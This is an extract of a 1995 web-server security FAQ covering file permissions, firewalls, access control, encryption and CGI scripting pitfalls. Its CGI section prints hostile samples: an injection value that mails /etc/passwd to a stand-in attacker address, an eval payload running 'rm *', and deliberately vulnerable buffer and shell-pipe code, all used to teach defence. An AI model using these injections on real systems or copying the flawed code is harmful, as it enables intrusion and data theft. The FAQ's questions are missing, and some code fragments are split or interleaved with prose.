.htaccess to control
access in individual directories is so convenient, why
should I use access.conf?
Copies of this document can be obtained at:
The author of this FAQ has very limited experience with the Macintosh and Windows servers. Web servers for these operating systems are pretty new, and there hasn't been much time for collective wisdom on the security issues for these platforms to form. I apologize for the pronounced Unix (and Linux) bias in this document. Help in fleshing out these topics is welcomed!
Much of this document is abstracted from the author's book "How to Set Up and Maintain a World Wide Web Site", published by Addison-Wesley.
This document is © copyright 1995, Lincoln D. Stein. However it may be freely reprinted and redistributed.
Many thanks to the following people for their helpful comments and contributions to this document:
It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes.
Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole.
Unix systems, with their large number of built-in servers, services, scripting languages, and interpreters, are particular vulnerable to attack because there are simply so many portals of entry for hackers to exploit. Less capable systems, such as Macintoshes and MS-Windows machines, are less easy to exploit. Then again it's harder to accomplish really cool stuff on these machines, so you have a tradeoff between convenience and security.
Of course you always have to factor in the experience of the people running the server host and software. A Unix system administered by a seasoned Unix administrator will probably be more secure than a MS Windows system set up by a novice.
Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server (available at http://hoohoo.ncsa.uiuc.edu/) or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA ( http://www.hyperreal.com/apache/info.html) is also free of this bug.
Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.
The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed. Information on WN's security features can be found in its online documentation at:
http://hopf.math.nwu.edu/docs/security.html
A table comparing the features of a large number of commercial, freeware and public domain servers has been put together by Paul Hoffman and is also available online:
http://www.proper.com/www/servers-chart.html
Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.
ftp://ftp.cert.org/pub/tools/crack/
3. Turn off unused services. For example, if you don't need to run FTP on the Web server host, physically remove the ftp daemon. Likewise for tftp, sendmail, gopher, NIS (network information services) clients, NFS (networked file system), finger, systat, and anything else that might be hanging around. Check the file /etc/inetd.conf for a list of daemons that may be lurking, and comment out the ones you don't use.
4. Remove shells and interpreters that you don't absolutely need. For example, if you don't run any Perl-based CGI scripts, remove the Perl interpreter.
5. Check both the system and Web logs regularly for suspicious activity. The program Tripwire is helpful for scanning the system logs and sensitive files for break in attempts:
ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/
More on scanning Web logs for suspicious activity below.
6. Make sure that permissions are set correctly on system files, to discourage tampering. The program COPS is useful for this:
ftp://ftp.cert.org/pub/tools/cops/
Be alert to the possibility that a _local_ user can accidentally make a change to the Web server configuration file or the document tree that opens up a security hole. You should set file permissions in the document and server root directories such that only trusted local users can make changes. Many sites create a "www" group to which trusted Web authors are added. The document root is made writable only by members of this group. To increase security further, the server root where vital configuration files are kept, is made writable only by the official Web administrator. Many sites create a "www" user for this purpose.
A source of timely information, including the discovery of new security holes, are the CERT Coordination Center advisories, posted to the newsgroup comp.security.announce, and archived at:
ftp://ftp.cert.org/pub/cert_advisories/
A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:
SUBSCRIBE www-security your_email_address
A series of security FAQs is mainted by Internet Security Systems, Inc. The FAQs can be found at:
http://www.iss.net/iss/faq.html
The main WWW FAQ also contains questions and answers relevant to Web security, such as log file management and sources of server software. The most recent version of this FAQ can be found at:
http://sunsite.unc.edu/boutell/faq/www_faq.html Table of contents
You need to protect the server from the prying eyes of both local and remote users. The simplest strategy is to create a "www" user for the Web administration/webmaster and a "www" group for all the users on your system who need to author HTML documents. On Unix systems edit the /etc/passwd file to make the server root the home directory for the www user. Edit /etc/group to add all authors to the www group.
The server root should be set up so that only the www user can write to the configuration and log directories and to their contents. It's up to you whether you want these directories to also be readable by the www group. They should _not_ be world readable. The cgi-bin directory and its contents should be world executable and readable, but not writable (if you trust them, you could local web authors write permission for this directory). Following are the permissions for a sample server root:
drwxr-xr-x 5 www www 1024 Aug 8 00:01 cgi-bin/ drwxr-x--- 2 www www 1024 Jun 11 17:21 conf/ -rwx------ 1 www www 109674 May 8 23:58 httpd drwxrwxr-x 2 www www 1024 Aug 8 00:01 htdocs/ drwxrwxr-x 2 www www 1024 Jun 3 21:15 icons/ drwxr-x--- 2 www www 1024 May 4 22:23 logs/The Netsite Commerce Server appears to contain a bug that prevents you from setting up the server root with correct permissions. In order to start up, this server requires that the logs directory either be writable by the "nobody" user, or that a log file writable by the "nobody" user already exist in that directory. In either case this represents a security hole, because it means that a remote user who was infiltrated the system by subverting a CGI script or the server itself can cover his tracks by modifying or deleting the access log file. It is not known if this bug affects the Netsite (non-Commerce) Server. (Thanks to Laura Pearlman for this information.)
The document root has different requirements. All files that you want to serve on the Internet must be readable by the server while it is running under the permissions of user "nobody". You'll also usually want local Web authors to be able to add files to the document root freely. Therefore you should make the document root directory and its subdirectories owned by user and group "www", world readable, and group writable:
drwxrwxr-x 3 www www 1024 Jul 1 03:54 contents drwxrwxr-x 10 www www 1024 Aug 23 19:32 examples -rw-rw-r-- 1 www www 1488 Jun 13 23:30 index.html -rw-rw-r-- 1 lstein www 39294 Jun 11 23:00 resource_guide.html
Many servers allow you to restrict access to parts of the document tree to Internet browsers with certain IP addresses or to remote users who can provide a correct password (see below). However, some Web administrators may be worried about unauthorized _local_ users gaining access to restricted documents present in the document root. This is a problem when the document root is world readable.
One solution to this problem is to run the server as something other than "nobody", for example as another unprivileged user ID that belongs to the "www" group. You can now make the restricted documents group- but not world-readable (don't make them group-writable unless you want the server to be able to overwrite its documents!). The documents can now be protected for prying eyes both locally and globally. Remember set the read and execute permissions for any restricted server scripts as well.
The CERN server generalizes this solution by allowing the server to execute under different user and group privileges for each part of a restricted document tree. See the CERN documentation for details on how to set this up.
Of course, turning off automatic directory listings doesn't prevent people from fetching files whose names they guess at. It also doesn't avoid the pitfall of an automatic text keyword search program that inadvertently adds the "hidden" file to its index. To be safe, you should remove unwanted files from your document root entirely.
The NCSA and Apache servers allows you to turn symbolic link following off completely. Another option allows you to enable symbolic link following only if the owner of the link matches the owner of the link's target (i.e. you can compromise the security of a part of the document tree that you own, but not someone else's part).
Options IncludesNoExec
This is not the scenario that people warn about when they talk about "running the server as root". This warning is about servers that have been configured to run their _child processes_ as root, (e.g. by specifying "User root" in the server configuration file). This is a whopping security hole because every CGI script that gets launched with root permissions will have access to every nook and cranny in your system.
Some people will say that it's better not to start the server as root at all, warning that we don't know what bugs may lurk in the portion of the server code that controls its behavior between the time it starts up and the time it forks a child. This is quite true, although the source code to all the public domain servers is freely available and there don't _seem_ to be any bugs in these portions of the code. Running the server as an ordinary unprivileged user may be safer. Many sites launch the server as user "nobody", "daemon" or "www". However you should be aware of two potential problems with this approach:
Consider this scenario: the WWW server that has been configured to execute any file ending with the extension ".cgi". Using your ftp daemon, a remote hacker uploads a perl script to your ftp site and gives it the .cgi extension. He then uses his browser to request the newly-uploaded file from your Web server. Bingo! he's fooled your system into executing the commands of his choice.
You can overlap the ftp and Web server hierarchies, but be sure to limit ftp uploads to an "incoming" directory that can't be read by the "nobody" user.
In order to run a server in a chroot environment, you have to create a whole miniature root file system that contains everything the server needs access to. This includes special device files and shared libraries. You also need to adjust all the path names in the server's configuration files so that they are relative to the new root directory. To start the server in this environment, place a shell script around it that invokes the chroot command in this way:
chroot /path/to/new/root /server_root/httpdSetting up the new root directory can be tricky and is beyond the scope of this document. See the author's book (above), for details. You should be aware that a chroot environment is most effective when the new root directory is as barren as possible. There shouldn't be any interpreters, shells, or configuration files (including
/etc/passwd!) in the new root directory. Unfortunately this means
that CGI scripts that rely on Perl or shells won't run in the chroot
environment. You can add these interpreters back in, but you lose
some of the benefits of chroot.
Also be aware that chroot only protects files; it's not a panacea. It doesn't prevent hackers from breaking into your system in other ways, such as grabbing system maps from the NIS network information service, or playing games with NFS.
other hosts
\
server <-----> FIREWALL <------> OUTSIDE
/
other hosts
However, if you want to make the server available to the rest of the world, you'll need to place it somewhere outside the firewall. From the standpoint of security of your organization as a whole, the safest place to put it is completely outside the local area network:
other hosts
\
other hosts <----> FIREWALL <---> server <----> OUTSIDE
/
other hosts
This is called a "sacrificial lamb" configuration. The server is at risk of being broken into, but at least when it's broken into it doesn't breach the security of the inner network.
It's _not_ a good idea to run the WWW server on the firewall machine. Now any bug in the server will compromise the security of the entire organization.
There are a number of variations on this basic setup, including architectures that use paired "inner" and "outer" servers to give the world access to public information while giving the internal network access to private documents. See the author's book for the gory details.
ftp://ftp.tis.com/firewalls/toolkit/
The CERN server can also be configured to act as a proxy. I feel much less comfortable recommending it, however, because it is a large and complex piece of software that may contain unknown security holes.
More information about firewalls is available in the books Firewalls and Internet Security by William Cheswick and Steven Bellovin, and Building Internet Firewalls by D. Brent Chapman and Elizabeth D. Zwicky.
ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/
You should also check your access and error log files periodically for suspicious activity. Look for accesses involving system commands such as "rm", "login", "/bin/sh" and "perl", or extremely long lines in URL requests (the former indicate an attempt to trick a CGI script into invoking a system command; the latter an attempt to overrun a program's input buffer). Also look for repeated unsuccessful attempts to access a password protected document. These could be symptomatic of someone trying to guess a password.
Individual documents or whole directories are protected in such a way that only browsers connecting from certain IP (Internet) addresses, IP subnets, or domains can access them.
Documents or directories are protected so that the remote user has to provide a name and password in order to get access.
Both the request for the document and the document itself are encrypted in such a way that the text cannot be read by anyone but the intended recipient. Public key cryptography can also be used for reliable user verification. See below.
One thing to be aware of is that if a browser is set to use a proxy server to fetch documents, then your server will only know about the IP address of the proxy, not the real user's. This means that if the proxy is in a trusted domain, anyone can use that proxy to access your site. Unless you know that you can trust a particular proxy to do its own restriction, don't add the IP address of a proxy (or a domain containing a proxy server) to the list of authorized addresses.
Restriction by host or domain name has the same risks as restriction by IP address, but also suffers from the risk of "DNS spoofing", an attack in which your server is temporarily fooled into thinking that a trusted host name belongs to an alien IP address. To lessen that risk, some servers can be configured to do an extra DNS lookup for each client. After translating the IP address of the incoming request to a host name, the server uses the DNS to translate from the host name back to the IP address. If the two addresses don't match, the access is forbidden. See below for instructions on enabling this feature in NCSA's httpd
Another problem is that the password is vulnerable to interception as it is transmitted from browser to server. It is not encrypted in any meanginful way, so a hacker with the right hardware and software can pull it off the Internet as it passes through. Furthermore, unlike a login session, in which the password is passed over the Internet just once, a browser sends the password each and every time it fetches a protected document. This makes it easier for a hacker to intercept the transmitted data as it flows across the Internet. To avoid this, you have to encrypt the data. See below.
If you need to protect documents against _local_ users on the server's host system, you'll need to run the server as something other than "nobody" and to set the permissions of both the restricted documents and server scripts so that they're not world readable. See Q9.
<Directory /full/path/to/directory>
<Limit GET POST> order mutual-failure deny from all allow from 192.198.2 .zoo.org allow from 18.157.0.5 stoat.outback.au </Limit> </Directory>
This will deny access to everybody but the indicated hosts (18.157.0.5 and stoat.outback.au), subnets (182.198.2) and domains (.zoo.org). Although you can use either numeric IP addresses or host names, it's safer to use the numeric form because this form of identification is less easily subverted (Q18).
One way to increase the security of restriction by domain name is to
make sure that your server double-checks the results of its DNS
lookups. You can enable this feature in
NCSA's httpd (and the related Apache server) by making sure that the
-DMAXIMUM_DNS flag is set in the Makefile.
For the CERN server, you'll need to declare a protection scheme with the Protection directive, and associate it with a local URL using the Protect directive. An entry in httpd.conf that limits access to certain domains might look like this:
Protection LOCAL-USERS {
GetMask @(*.capricorn.com, *.zoo.org, 18.157.0.5)
}
Protect /relative/path/to/directory/* LOCAL-USERS
Check your server documentation for the precise details of how to add new users. For NCSA httpd, you can add a new user to the password file using the htpasswd program that comes with the server software:
htpasswd /path/to/password/file usernamehtpasswd will then prompt you for the password to use. The first time you invoke htpasswd you must provide a -c flag to create the password file from scratch.
The CERN server comes with a slightly different program called htadm:
htadm -adduser /path/to/password/file usernamehtadm will then prompt you for the new password.
After you add all the authorized users, you can attach password protection to the directories of your choice. In NCSA httpd and its derivatives, add something like this to access.conf:
<Directory /full/path/to/protected/directory>
AuthName name.of.your.server
AuthType Basic
AuthUserFile /usr/local/etc/httpd/conf/passwd
<Limit GET POST>
require user valid-user
</Limit>
</Directory>
You'll need to replace AuthUserFile with the full path to the password
file. This type of protection can be combined with IP address
restriction as described in the previous section. See NCSA's online
documentation (http://hoohoo.ncsa.uiuc.edu/) or the author's book for
more details.
For the CERN server, the corresponding entry in httpd.conf looks like this:
Protection AUTHORIZED-USERS {
AuthType Basic
ServerID name.of.your.server
PasswordFile /usr/local/etc/httpd/conf/passwd
GetMask All
}
Protect /relative/path/to/directory/* AUTHORIZED-USERS
Again, see the documentation or the author's book for details.
http://your.site.com/protected/directory/.htaccessThis is clearly an undesirable feature since it gives out important information about your system, including the location of the server password file.
Another problem with the the per-directory access files is that if you ever need to change the server software, it's a lot easier to update a single central access control file than to search and fix a hundred small files.
Most practical implementations of secure Internet encryption actually combine the traditional symmetric and the new asymmetric schemes. Public key encryption is used to negotiate a secret symmetric key that is then used to encrypt the actual data.
Since commercial ventures have a critical need for secure transmission on the Web, there is very active interest in developing schemes for encrypting the data that passes between browser and server.
More information on public key cryptography can be found in the book "Applied Cryptography", by Bruce Schneier.
SSL (Secure Socket Layer) is the scheme proposed by Netscape Communications Corporation. It is a low level encryption scheme used to encrypt transactions in higher-level protocols such as HTTP, NNTP and FTP. The SSL protocol includes provisions for server authentication (verifying the server's identity to the client), encryption of data in transit, and optional client authentication (verifying the client's identity to the server). SSL is currently implemented commercially only for Netscape browsers and some Netscape servers. (While both the data encryption and server authentication parts of the SSL protocol are implemented, client authentication is not yet available.) Open Market, Inc. has also announced plans to support SSL in a forthcoming version of their HTTP server. Details on SSL can be found at:
http://home.netscape.com/info/SSL.html
SHTTP (Secure HTTP) is the scheme proposed by CommerceNet, a coalition of businesses interested in developing the Internet for commercial uses. It is a higher level protocol that only works with the HTTP protocol, but is potentially more extensible than SSL. Currently SHTTP is implemented for the Open Marketplace Server marketed by Open Market, Inc on the server side, and Secure HTTP Mosaic by Enterprise Integration Technologies on the client side. See here for details:
http://www.commerce.net/information/standards/drafts/shttp.txt
Shen is scheme proposed by Phillip Hallam-Baker of CERN. Like SHTTP it is a high level replacement for the existing HTTP protocol. It hasn't yet been implemented in production quality software at the current time. You can read about it at:
http://www.w3.org/hypertext/WWW/Shen/ref/security_spec.html
Even with an encrypting server, you should be careful about what happens to the credit card number after it's received by the server. For example, if the number is received by a server script, make sure not to write it out to a world-readable log file or send it via e-mail to a remote site.
These are all schemes that have been developed to process commercial transactions over the Web without transmitting credit card numbers.
The First Virtual scheme, designed for low- to medium-priced software sales and fee-for-service information purchases, the user signs up for a First Virtual account by telephone call. During the sign up procedure he provides his credit card number and contact information, and receives a First Virtual account number in return. Thereafter, to make purchases at participating online vendors, the user provides his First Virtual account number in lieue of his credit card information. First Virtual later contacts him by e-mail, and he has the chance to approve or disapprove the purchase before his credit card is billed. First Virtual is in operation now and requires no special software or hardware on the user's or merchant's sides of the connection. More information can be obtained at:
Digicash, a product of the Netherlands Digicash company, is a debit system something like an electronic checking account. In this system, users make an advance lump sum payment to a bank that supports the DigiCash system, and receive "E-cash" in turn. Users then make purchases electronically and the E-cash is debited from their checking accounts. This system is currently in development and has not been released for public use. It also appears to require special client software to be installed on both the user's and the merchant's computers. For more information:
Cybercash, invented by the Cybercash Corporation, is both a debit and a credit card system. In credit card mode, the user installs specialized software on his computer. When the WWW browser needs to obtain a credit card number, it invokes the Cybercash software which pops up a window that requests the number. The number is then encrypted and transmitted to corresponding software installed on the merchant's machine. In debit mode, a connection is established to a participating bank. Cybercash is in the pilot phase, and more information can be obtained at:
In addition to these forms of credit card payment, the Netscape Communications Corporation has made deals with both First Data, a large credit card processor, and MasterCard to incorporate credit card processing into the Netscape/Netsite combination. These arrangements, when implemented, will use Netscape's built-in encryption to encode and approve credit card purchases without additional software. For more information, check the literature at:
Open Market, Inc., is also offering credit card purchases. In this scheme, Open Market acts as the credit card company itself, handling subscriptions, billing and accounting. The scheme is integrated into its Open Marketplace Server, and requires a browser that supports the SHTTP protocol (only Secure Mosaic, at the moment). This service too is in the pilot stage. More information is available from Open Market at:
CGI scripts can present security holes in two ways:
CGI scripts are potential security holes even though you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high numbered port (it just needs to execute a few commands in Perl to accomplish this). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.
There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A cgi-bin directory with tightly-controls lessens the possibility of this happening.
First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.
Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:
http://your-site/a/path/your_script.cgi~
(This is another good reason to limit CGI scripts to cgi-bin and to
make sure that cgi-bin is separate from the document root.)
Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.
Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.
A third consideration is that the scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scriptig languages are poor choices for anything more than trivial CGI programs.
All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail shows. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by other people than the author. Furthermore, Perl contains a number of built-in features that were designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make a Perl scripts safer in some respects than the equivalent C program.
You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.
Things to think about when you examine a script:
The holes in these scripts were discovered by Paul Phillips (paulp@cerf.net), who also wrote the CGI security FAQ. Check here for reports of other buggy scripts.
In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.
This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public. Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.
Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.
A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:
#include <stdlib.h>The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.
#include <stdio.h> static char query_string[1024]; char* read_POST() {
int query_size; query_size=atoi(getenv("CONTENT_LENGTH")); fread(query_string,query_size,1,stdin); return query_string; }
Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:
char* read_POST() {
int query_size=atoi(getenv("CONTENT_LENGTH"));
char* query_string = (char*) malloc(query_size);
if (query_string != NULL)
fread(query_string,query_size,1,stdin);
return query_string;
}
Of course, once you've read in the data, you should continue to make
sure your buffers don't overflow. Watch out for strcpy(), strcat()
and other string functions that blindly copy strings until they reach
the end. Use the strncpy() and strncat() calls instead.
#define MAXSTRINGLENGTH 256 char myString[MAXSTRINGLENGTH]; char* query = read_POST(); myString[MAXSTRINGLENGTH-1]='\0'; /* ensure null byte */ strncpy(myString,query,MAXSTRINGLENGTH-1); /* don't overwrite null byte */(Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.
Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.
The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.
$mail_to = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail $mail_to"); print MAIL "To: $mailto\nFrom: me\n\nHi there!\n"; close MAIL;The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wiley hacker passes an e-mail address that looks like this?
nobody@nowhere.com;mail badguys@hell.org</etc/passwd;
Now the open() statement will evaluate the following command:
/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwdUnintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.
$mail_to = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail -t -oi"); print MAIL <<END;C programmers can use the exec family of commands to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.
To: $mailto
From: me (me\@nowhere.com)
Subject: nothing much Hi there! END close MAIL;
You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. In fact, it's wise policy to make sure that all user input arguments are what you expect. Even if you don't pass user variables through the shell, you can never be sure that they don't contain constructions that reveal bugs in the programs you're calling.
For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:
$mail_to = &get_name_from_input; # read the address from form
unless ($mail_to =~ /^[\w-.]+\@[\w-.]$/) {
die "Address not in form foo@nowhere.com";
}
(This particular pattern match may be too restrictive for some sites.
It doesn't allow UUCP-style addresses or any of the many alternative
addressing schemes).
system("ls -l /local/web/foo");
use this:
system("/bin/ls -l /local/web/foo");
If you must rely on the PATH, set it yourself at the beginning of your
CGI script:
putenv("PATH=/bin:/usr/bin:/usr/local/bin");
In general it's not a good idea to put the current directory (".") into the path.
This is not quite true. cgiwrap (by Nathan Neulinger <nneul@umr.edu>, http://www.umr.edu/~cgiwrap) was designed for multi-user sites like university campuses where local users are allowed to create their own scripts. Since CGI scripts run under the server's user ID (e.g. "nobody"), it is difficult under these circumstances for administrators to determine whose script is generating bounced mail, errors in the server log, or annoying messages on other user's screens. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script.
cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. Although this simplifies administration and prevents users from interfering with each other, it does put the individual user at tremendous risk. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command
rm -r ~
Worse, since the subverted CGI script has write access to the user's home directory, it could place a trojan horse in the user's directory that will subvert the security of the entire system. The "nobody" user, at least, usually doesn't have write permission anywhere.
When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.
http://www.primus.com/staff/paulp/cgi-security/
CGI security is also covered by documentation maintained at NCSA:
http://hoohoo.ncsa.uiuc.edu/cgi/security.html
$date = `/bin/date`;
You can open up a pipe to a program:
open (SORT, " | /usr/bin/sort | /usr/bin/uniq");You can invoke an external program and wait for it to return with system():
system "/usr/bin/sort < foo.in";or you can invoke an external program and never return with exec():
exec "/usr/bin/sort < foo.in";All of these constructions can be risky if they involve user input that may contain shell metacharacters. For system() and exec(), there's a somewhat obscure syntactical feature that allows you to call external programs directly rather than going through a shell. If you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no unwanted side effects. For example:
system "/usr/bin/sort","foo.in";You can take advantage of this feature to open up a pipe without going through a shell. By calling open on the magic character sequence
|-, you fork a copy of Perl and open a pipe to the copy. The child
copy then immediately exec's another program using the argument list
variant of exec().
open (SORT,"|-") || exec "/usr/bin/sort",$uservariable;
while $line (@lines) {
print SORT $line,"\n";
}
close SORT;
To read from a pipe without opening up a shell, you can do something
similar with the sequence -|:
open(GREP,"-|") || exec "/usr/bin/grep",$userpattern,$filename;
while (<GREP>) {
print "match: $_";
}
close GREP;
These are the form of open() you should use whenever you would otherwise
perform a piped open to a command.
An even more obscure feature allows you to call an external program and lie to it about its name. This is useful for calling programs that behave differently depending on the name by which they were invoked.
The syntax is
system $real_name "fake_name","argument1","argument2"For example:
$shell = "/bin/sh"This invokes the shell using the name "-sh", forcing it to behave interactively. Note that the real name of the program must be stored in a variable, and that there's no comma between the variable holding the real name and the start of the argument list.
system $shell "-sh","-norc"
There's also a more compact syntax for this construction:
system { "/bin/sh" } "-sh","-norc"
You turn on taint checks in version 4 of Perl by using a special version of the interpreter named "taintperl":
#!/usr/local/bin/taintperlIn version 5 of perl, pass the -T flag to the interpreter:
#!/usr/local/bin/perl -TSee below for how to "untaint" a variable.
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
Adjust this as necessary for the list of directories you want
searched. It's not a good idea to include the current directory
(".") in the path.
$mail_address=~/([\w-.]+\@[\w-.]+)/; $untainted_address = $1;
$foo=~/$user_variable/ is unsafe?
foreach (@files) {
m/$user_pattern/o;
}
Now, however, Perl will ignore any changes you make to the user
variable, making this sort of loop fail:
foreach $user_pattern (@user_patterns) {
foreach (@files) {
print if m/$user_pattern/o;
}
}
To get around this problem Perl programmers often use this sort of
trick:
foreach $user_pattern (@user_patterns) {
eval "foreach (\@files) { print if m/$user_pattern/o; }";
}
The problem here is that the eval() statement involves a user-supplied
variable. Unless this variable is checked carefully, the eval()
statement can be tricked into executing arbitrary Perl code. (For
example of what can happen, consider what the eval statement does if
the user passes in this pattern: "/; system 'rm *'; /"
The taint checks described above will catch this potential problem. Your alternatives include using the unoptimized form of the pattern matching operation, or carefully untainting user-supplied patterns. In Perl5, a useful trick is to use the escape sequence \Q \E to quote metacharacters so that they won't be interpreted:
print if m/\Q$user_pattern\E/o;
You can make a script run with the privileges of its owner by setting its "s" bit:
chmod u+s foo.plYou can make it run with the privileges of its owner's group by setting the s bit in the group field:
chmod g+s foo.plHowever, many Unix systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in a nasty error message from Perl itself.
You have two options on such systems:
ftp://rtfm.mit.edu/pub/usenet-by-group/comp.lang.perl/
#include <unistd.h>
void main () {
execl("/usr/local/bin/perl","foo.pl","/local/web/cgi-bin/foo.pl",NULL);
}
After compiling this program, make it suid. It will run under its
owner's permission, launching a Perl interpreter and executing the
statements in the file "foo.pl".
Another option is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do. If you're using the CERN server, you can even run as a different user for each script. See the CERN documentation for details.
(Thanks to Bob Bagwill who contributed many of the Q&A's in this section)
Most servers log every access. The log usually includes the IP address and/or host name, the time of the download, the user's name (if known by user authentication or obtained by the identd protocol), the URL requested (including the values of any variables from a form submitted using the GET method), the status of the request, and the size of the data transmitted. Some browsers also provide the client the reader is using, the URL that the client came from, and the user's e-mail address. Servers can log this information as well, or make it available to CGI scripts. Most WWW clients are probably run from single-user machines, thus a download can be attributed to an individual. Revealing any of those datums could be potentially damaging to a reader.
For example, XYZ.com downloading financial reports on ABC.com could signal a corporate takeover. The accesses to a internal job posting reveals who might be interested in changing jobs. The time a cartoon was downloaded reveals that the reader is misusing company resources. A referral log entry might contain something like:
file://prez.xyz.com/hotlists/stocks2sellshort.html -> http://www.xyz.com/
The pattern of accesses made by an individual can reveal how they intend to use the information. And the input to searches can be particularly revealing.
Another way Web usage can be revealed locally is via browser history, hotlists, and cache. If someone has access to the reader's machine, they can check the contents of those databases. An obvious example is shared machines in an open lab or public library.
Proxy servers used for access to Web services outside an organization's firewall are in a particularly sensitive position. A proxy server will log every access to the outside Web made by every member of the organization and track both the IP number of the host making the request and the requested URL. A carelessly managed proxy server can therefore represent a significant invasion of privacy.
If you are a government site, you may be required by law to protect the privacy of your readers. For example, U.S. Federal agencies are not allowed to collect or publish many types of data about their clients.
